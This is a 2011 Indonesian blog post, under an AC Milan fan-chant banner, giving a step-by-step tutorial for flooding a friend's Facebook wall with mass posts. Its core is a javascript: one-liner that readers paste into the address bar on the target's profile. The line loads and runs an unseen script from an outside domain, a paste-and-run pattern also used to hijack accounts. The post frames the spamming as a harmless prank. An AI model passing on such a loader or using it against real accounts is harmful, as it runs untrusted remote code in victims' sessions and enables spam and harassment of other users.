" AC MILAN Il Club Piu Titolato al Mondo - CAMPIONI D'ITALIA 2010-2011 | Ale Ale Ale Milan Ale, Forza Lotta Vincerai Non Ti Lasceremo Mai | Forza Milan, Milan Campione, Forza Milan il Milan ole. Forza Milan, vinci per noi, Forza Milan La Sud e Con Te. Ale Ale Ale Forza Milan Ale Ale | Ed i colori che noi portiamo, sono la gloria, sono la gloria, Ed i colori che noi portiamo, sono la gloria, dei Rossone', forza Milan ole', forza Milan ole', forza Milan ole' ole' ole', Milan ! Milan ! Milan ! | Siamo qui, che cantiam, con il cuore, Diavolo vinci, per noi"

Kamis, 16 Juni 2011

Facebook Wall Flooder

Pengen isengin wall facebook temen? Facebook wall flooder salah satu caranya. Dengan facebook wall flooder ini kita bisa kirim wallpost dalam jumlah banyak dalam sekali klik di akun facebook teman anda. Ok caranya pilih target lalu klik profil nya, pada address bar (kolom www) hapus semua URL nya lalu masukan script berikut ini :
javascript:(a = (b = document).createElement("script")).src = "//indonesiansoceng.tk/Flood.JS", b.body.appendChild(a); void(0);
langsung saja anda tekan enter.


Akan ada jendela pop-up yang bertuliskan Masukan Jumlah Pesan Yang Akan Dikirim anda isi saja jumlah yang anda inginkan, misal 100.



Akan muncul jendela pop-up kembali Masukan Pesan Anda silahkan tulis kata-kata yang ingin anda kirimkan ke si target



Hasilnya akan seperti ini, namun anda harus merefresh profile target, atau klik saja beranda lalu kembali lagi ke profile target agar hasil flood anda terlihat hasilnya



Catatan:
Jangan terlalu sering menggunakan Facebook Wall Flooder karena nanti akun Facebook anda akan di blokir, paling ringan anda tidak bisa kirim wall ke teman selama 1-2 hari, sedangkan yang paling parah akun Facebook anda bisa di blokir permanen karena di anggap melakukan spam, gunakan Facebook Wall Flooder seperlunya saja, sebagai tambahan biasanya hal seperti ini cepat di patch sama Facebook jadi jika suatu saat nanti tidak bisa lagi berarti celah ini sudah di patch.

Special thanks for agan : s1s1 9elap Qu™

Tidak ada komentar:

Posting Komentar